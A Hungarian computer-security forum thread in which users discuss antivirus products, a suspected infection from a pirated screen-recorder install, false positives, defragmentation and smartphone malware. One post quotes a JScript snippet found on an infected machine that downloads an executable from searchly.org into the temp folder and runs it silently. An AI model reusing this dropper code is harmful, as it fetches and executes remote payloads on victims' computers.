41134
bannerkesz.png
**********************************************************



*******************************************

Megszűnt szolgáltatások:
Comodo elemzés
Valami nyavalya lezárta a gépem és kódot kér. :(

  • Jim Morrison
    #40894
    hivatalos oldalról töltöttem le, és még egy akció keretében 1 éves kulcsot kaptam hozzá.
  • kl24h
    #40893
    Én valamikor letöltöttem a BitDefender-t, de akkor is a hivatalos oldalról és utána meg kerestem hozzá kulcsot (rendes betűkből álló kulcsot, mert a TrialReset csak kitol az emberrel és nem lesz megfelelő a védelem). A BitDefender nagyon jó védelem, az elsők között van, ha rendesen működik, tehát ha nincs megkrekkelve.
  • Jim Morrison
    #40892
    szerintem a mirellis action!-nal, mivel egy különálló mirellis mappában volt. Pedig torrent leírásánál nem találkoztam semmi rosszal :(
  • kl24h
    #40891
    Nem a BitDefender-rel fertőzted be?
  • Jim Morrison
    #40890
    na frankón kiszedtem egy vírust vagy mit, amit akkor szedtem össze, mikor felraktam a bitdefendert meg ilyenek. Azt vettem észre, hogy van egy update.exe ami csak eszi a memóriát és a hálózatot is folyamatosan foglalja. Akárhányszor becsuktam mindig jött a böngésző, hogy kapcsoljam ki a proxyt. És tényleg volt helyi hálózatra proxy, nem is értettem, kikapcsolni meg nem tudtam. internetbeállításokban meg volt egy alsó sárga figyelmeztetés, hogy csak admin változtathat proxyt. Wut? Végül sikerült megoldani, hogy regeditben kellett egy PerUserProxy értéket 0-ról 1-re állítani, miután töröltem a Mirillis mappában lévő updater.exe-t.
    Ha esetleg találkozna valaki hasonlóval, bedobtam ide.

    Valszeg a mirillis action! tette fel 1 hónapja kb, de semmi nem észlelte. Meghagytam egy elég érdekes ini fájlt:
    SPOILER! Kattints ide a szöveg elolvasásához!
    részlet:

    var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    WinHttpReq.Open("GET", "http://searchly.org/xVwd2.php", /*async=*/false);
    WinHttpReq.Send();
    strDlUrl = WinHttpReq.ResponseText;

    var TmpDir = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%");

    var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    WinHttpReq.Open("GET", strDlUrl, /*async=*/false);
    WinHttpReq.Send();

    BinStream = new ActiveXObject("ADODB.Stream");
    BinStream.Type = 1;
    BinStream.Open();
    BinStream.Write(WinHttpReq.ResponseBody);
    BinStream.SaveToFile(TmpDir + "\\wVx4rt.exe",2);

    var WshShell = new ActiveXObject("WScript.Shell");
    WshShell.Run (TmpDir + "\\wVx4rt.exe /quiet");

  • kl24h
    #40889
    gergely1991: Ebben igazad van, sajnos sokan így csinálják, mert nem tetszik, hogy az Avast riaszt, pedig van mikor ténylegesen fertőzésről van szó. De megtörténhet, hogy nem riaszt és befertőződik a gép keményen. itt persze játszik az is szerepet, hogy ki melyik verziót használja (ingyenes vagy az legalább az Internet Security-t) és hogy nincs-e "krekkelve".
    Sajnos azt kell mondjam, hogy a testvérem gépjéről le kellett töröljem az Avast-ot. Egy olyan *.sys fájl került be a gépjébe (ha jól emlékszem a .../system32/drivers/gt.sys, Windows XP SP3 rendszer), hogy nem akadályozta a gépet, de ha egy távoli kapcsolat érkezett (Team Viewer-rel) egyből RESET, indult is újra a gép. Ki is sepertem, azóta 360 Total Security-t telepítettem fel és maximális védelemre kapcsoltam (Avira és BitDefender motorok valós időben működnek).
    Azért töröltem le, mert eltelt egy pár nap és nem detektálta, pedig frissített rendesen. Ha detektálta volna, akkor adtam volna egy boot idejű keresést és akkor gondolom ki tudta volna törölni.
  • kl24h
    #40888
    AV-Comparatives: link1
    Virus Bulletin: link2
    Utoljára szerkesztette: kl24h, 2015.01.13. 20:57:30
  • nandorb
    #40887
    Mar felrakta vki. aztan lattam.... Elmeletileg egy halom JMBG lett megosztva de ezek allitolag csak az egyik partra szavazzottak...
  • kjhun
    #40886
    Mi lenne ez? Csomó XLS-t látok benne, a fájl egy részét leszedvén. Amúgy, miért nem tolod fel? 128MB-ot lehet már feltölteni oda. 0.5Mbit-es uploaddal is kényelmesen felmegy ~40perc alatt.
  • nandorb
    #40885
    Vki. felbirja tolteni a virustotal-ra ezt a rar.-t?

    https://www.sendspace.com/file/8fm8ne
  • kl24h
    #40884
    Az ilyenek nagyon szórakoztatóak, legalábbis nekem.
    Elvileg most már mindent könnyen ki lehet seperni, csak meg kell találni egyszer!
  • kjhun
    #40883
    Ha, valaki elkapta a PClock névre hallgató ransomware-t, itt a megoldás. (Nálam, eddig még nem járt ilyen, ne is jöjjön.)
  • KaBuTo666
    #40882
    Hát figyelj, én sosem használtam ilyen defrag programokat, még nagyon régen kíváncsiságból kipróbáltam.
    Kb. 3 éves a gépem/rendszerem, ccleanert használom, az intel ssd-hez a toolboxot. Ezeket havonta 1x lefuttatom. Problémamentesen működik minden a mai napig. Windows 7 rendszerem van.
  • Jim Morrison
    #40881
    beépített re nem is gondoltam...>.< én inkább akkor defragolok amikot eszembe jut, annyit talán nem számít, ha mégis, azért elkanászodni nem hagyom :)
  • gergely1991
    #40880
    win+r : dfrg.msc és a többit elfelejtheted. :)
    Sokan bekapcsolják hogy real-time figyeljék és "optimalizálják" a lemezt,gond ezáltal az, hogy rohadt lassan indul a böngéződ és olykor egyéb szaggadtások léphetnek fel....
    Amúgyis win 7 esetén így már kettő is futna real-time:kapcsold ki win7 real-time-ját és úgy havi rutinként futass egy munkamenetet.
    Utoljára szerkesztette: gergely1991, 2015.01.11. 18:15:10
  • Jim Morrison
    #40879
    van ssd-m - rendszernek (120GB). Mellette van 500GB-os játékoknak, meg képeknek (épp gondolkoztam egy 500GB os SSD-n). Van még egy hdd-m, de azt meg adattárolásra használom. 500GB SSD meg egy kisebb vagyon.
  • KaBuTo666
    #40878
    Torrentezésre én már nem utorrentet használok.
  • KaBuTo666
    #40877
    Vegyél ssd-t, és nem kell ilyet csinálnod. Amúgy a defrag sokkal jobb.
  • Jim Morrison
    #40876
    Bitdefender total 2015 töredezettség mennyire jó? felejtsem el és töltsek le egy rendes defrag progit?
  • Blum
    #40875
    Amennyi szemetet beleraktak az új utorrent verziókba, nem csodálom, hogy némelyik antivirus beriaszt rá :D
  • KaBuTo666
    #40874
    Az μTorrent, és nem lett vírusos. Fals. Tedd kivételekbe.
  • simon7012
    #40873
    Sziasztok!
    A qtorrent vírusos lett?
    Ugrik rá a G-Data Bitdefender motorja...
  • kl24h
    #40872
  • gergely1991
    #40871
    Azthiszem ideje lezárnom ezt a off témát:
    Szerintem mindegyiknek megvannak/meglesznek a maga problémái.
    Linuxra is elmondták hogy milyen biztonságos egyszer csak szivárgott egy biztonsági rés amivel bárki könnyen átveheti az irányítást a gép felett és még root jogosultságot szerez.Ez annak köszönhető hogy jó néhány szerveren már linux fut sok hivatalnál is átálltak az ingyenes megoldásra.Ez az jelenti hogy minél divatosabb a rendszer annál inkább fenyegetettebb a támadásoktól.......
    Azaz Windows Phone esetében még nem terjedt el, amennyiben el fog, akkor ők is célpontjai lesznek a támadásoknak.
  • KaBuTo666
    #40870
    Főnök kollégámnak olcsóbb kategóriás alcatel okostelefonja van androiddal, vígan el van vele. Az is 50k-n belül volt, az igaz hogy nem 1 éves hanem kb. 3 hónapos okostelefon. A tied ha jól látom jóval régibb, azóta meg változott a helyzet.
    De te is tapasztalatból beszélsz, én is. Nekem ez a tapasztalatom a körömben. Szerintem mind a 3 rendszer jó, a többi csak az emberen és a pénzen múlik meg a jó választáson.
  • nandorb
    #40869
    Windows phone aze jobb mert a budget kategoria strapabb mint az ugyanazzon a kategorian belul levo androidos... 2eve megvan az androidos budget telefon. Alcatel OT 992D eddig legalabb 6x flasheltem le mindig ugyanaz a gond,idovel belassul... Se fb app se twitter... Neha megnezzek hireket,bus applikacio es ennyi. Mindig ugyanaz az eredmeny. Ez volt az utolso fos amit vettem.
  • KaBuTo666
    #40868
    Fél igazság, de akkor sincs értelme az egésznek, mert ha úgy van hogy a wp telefonnak kevesebb ram kell, stb, akkor is ha megnézed, nem merül le lassabban mint egy normális androidos teló. De láttszikhogy nincs tapasztalatod, és ez itt a probléma. Én már mint a 3 telefont kezeltem (wp,ios,android). Én az androidnál maradtam, és fogok is. Főleg az android 5.0 után. De ha neked jobb a wp, vedd azt! :)) A lényeg, hogy neked megfelelő legyen.
  • kl24h
    #40867
    Hogy ne nagyon térjünk ki a topik témájából, #40858 linkeltem valamit, én már leteszteltem, hát ... teszteljétek le ti is!
  • kl24h
    #40866
    ESETéknél nincs WP 8.1, még WP7-re sem, csak Windows Mobile 5.0, 6.0, 6.1 and 6.5 , viszont Comodo-ék nem nagyon teszik olyan könnyen láthatóvá az oldalukon a Comodo ESM Console.

    KaBuTo666: A másik dolog, hogy az Android esetében ugyanarra a gyorsaságra több RAM kell és processzor frekv., mint egy WP8.1 rendszerű okostelefonnál. Ezt többen is mondták és több helyen olvastam (igaz saját tapasztalatom nincs, mert nem tudtam kipróbálni), hogy az Android alkalmazások több erőforrást igényelnek, mint a WP alkalmazások.
  • gergely1991
    #40865
    nod,comodo
  • KaBuTo666
    #40864
    Réges-régen még a linuxra, mac osx-re is azt mondták hogy nem kell antivírus, mert nincs és nem lesz rá vírus olyan biztonságos. Hát mégis lett, és a mai napig van, pl a nod is csinál.
    A sony azt mondta, nem lehet feltörni a konzoljukat. A PS3-t feltörte az a srác.
    Alábecsülöd a hackereket. Lesz vírus előbb utóbb windows phonera, vagy van, csak mi nem tudunk róla. Egyelőre nem olyan népszerű ez a mobil, de a jövőt te sem látod. Szerintem ne úgy válassz mobil rendszert, hogy az első opciód a biztonság.
  • kl24h
    #40863
    Az érdekes az, hogy az antivírus cégek nem írnak WP-ra antivírust, csak Android-ra és iOS-re. Ez is azt árulja, hogy WP-ra nem szükség védelem. Az AVG-nek van valami WP antivírusa, de az inkább olyan Kids Corner és Link ellenőrző. Szerintem csak épp úgy mintha nem lenne mit dolgozniuk, nem írnának Andorid-ra és iOS-re antivírust.
    Szerintem a legtöbb okostelefon felhasználó egyáltalán nem használja ki az internetet és nem böngésznek mindenféle oldalon és ezért nem kerül be vírus az Android telefonokba.
    A malwaretips.com vannak olyan csomagok, amelyek sokszor tele vannak *.apk fertőzött fájlokkal, ezt se felejtsük el!
  • KaBuTo666
    #40862
    Ez is egy olyan rendszert, mint ami a számítógépeken van. Ha van eszed, nem fogsz beszedni mobil vírusokat.
    Érdekes módon nekem évek óta van okos-telefonom, vírust még nem sikerült összeszedtem úgy hogy antivírust se használok.
    PC-n van antivírus, de nem kellett izzadnia mellettem.
    Ha tényleg ennyire paranoiás vagy, akkor nagyon egyszerű a dolog...nem kell okos telefont venned. Maradj a hagyományos gombos mobiloknál. Azzal is tudsz telefonálni, sms-t írni.
    A másik meg, nem tudhatod hogy nincs vírus windows phonera. Maximum hiheted.
  • kl24h
    #40861
    Tudom azt, hogy mik az előnyei/hátrányai az Android rendszerű telefonoknak és azt is tudom, hogy esetleg mik a előnyei/hátrányai a Windows Phone 8.1 rendszerű telefonoknak.
    Azért jó lenne, ha leírnád a te véleményedet is, mivel azt mondtad, hogy "Kicsit túlzásba estél ezzel a mobil vírusos dologgal, számolj el 50-ig és gondold át mit is akarsz venni."
  • KaBuTo666
    #40860
    Kicsit túlzásba estél ezzel a mobil vírusos dologgal, számolj el 50-ig és gondold át mit is akarsz venni.
  • kl24h
    #40859
    Szerintem kellene egy másik antivírust telepíts a mobilodra (pl. ezt ajánlanám: TrustPort Mobile Security). Nekem nincs okos telefonom, akarok venni, de nem Android rendszerűt, hanem Windows Phone, mert annál nincsenek ilyen fertőzéses dolgok. A Windows Phone rendszerű okos telefon az egyetlen, amelyik nem fertőzhető "még".
  • kl24h
    #40858
    SecureAPlus
  • Ironman2
    #40857
    Hi all! Mobilomon nézegettem khm... képeket (oldalakat),erre bejött egy olyan oldal hogy megfertőződött a készülékem a tapsnake virussal,irjam be a telefonszámomat,és ingyen eltávolitja a készülékemről.Nem irtam be semmit se hanem kiléptem onnan,szerintem reklámoldal volt,az ilyeneknek ugyse dőlök be.Avast van a mobilomon,az meg nem talált ilyen virust,de ahogy utánanéztem fel sem ismeri az Avast.Tap Snake játék nincs a mobilomon,gps-t alig vagy egyáltalán nem használok,akkor ezek szerint tényleg megfertőzhetettt a mobilom,vagy csak kamu oldal volt? Mivel tudnám leellenőrizni? Avast mennyire védi a készüléket? (LG Optimus F6)

    Ezek szerint maga a Tapsnake játék a kémprogram?

    Aki ért hozzá csak az válaszoljon,felesleges kommenteket mellőzzétek ha lehet!
    Utoljára szerkesztette: Ironman2, 2014.12.12. 12:50:18
  • KaBuTo666
    #40856
    Nálam nincs probléma, bár ezen meg se lepődöm.
  • kl24h
    #40855
    Az antivírus kellene detektálja, ha van valami kémprogram a gépen, ha viszont ezeket nem fogja detektálni, akkor kár megvásárolni az adott antivírus programot. Ha az ilyen kémprogramok be lesznek téve a "fehér listába", akkor az antivírus cégek fognak veszíteni.